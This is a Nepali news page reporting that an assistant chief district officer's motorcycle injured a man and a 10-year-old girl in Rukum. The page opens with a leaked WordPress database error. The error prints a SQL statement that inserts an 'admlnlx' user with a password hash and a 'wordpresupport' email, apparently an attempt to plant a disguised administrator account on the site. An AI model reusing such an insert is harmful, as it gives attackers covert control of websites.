WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bl.9GPZs9b246xZB5qXTQFH7fq3TwU/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 06:03:20', '', 'admlnlx', 'admlnlx')
रुकुम, माघ १७–
सहायक प्रमुख जिल्ला अधिकारीको मोटरसाइकलले ठक्कर दिँदा रुकुममा दुईजना गम्भीर घाइते भएका छन् ।
मुसिकोट नगरपालिकाको ठारढुङ्गामा रहेको आफ्नो घरबाट आज बिहान कार्यालय आउँदै गर्दा सहायक प्रजिअ शेरबहादुर पुन चढेको रा१ब २४९ नंको मोटरसाइकलले ठक्कर दिँदा मुसिकोट नगरपालिका–६ का ५५ वर्षीय लोकबहादुर खत्री र सल्यान बाक्चौर की १० वर्षीया भविता पुन घाइते भएका हुन् ।
घाइते खत्रीको टाउको, ढाड र खुट्टामा गहिरो चोट लागेको जिप्रका, रुकुमले जानकारी दिएको छ । घाइते दुवैलाई स्थानीय मेडिकलमा सामान्य उपचारपछि थप उपचारका लागि नेपालगन्ज पठाइएको प्रहरीको भनाइ छ ।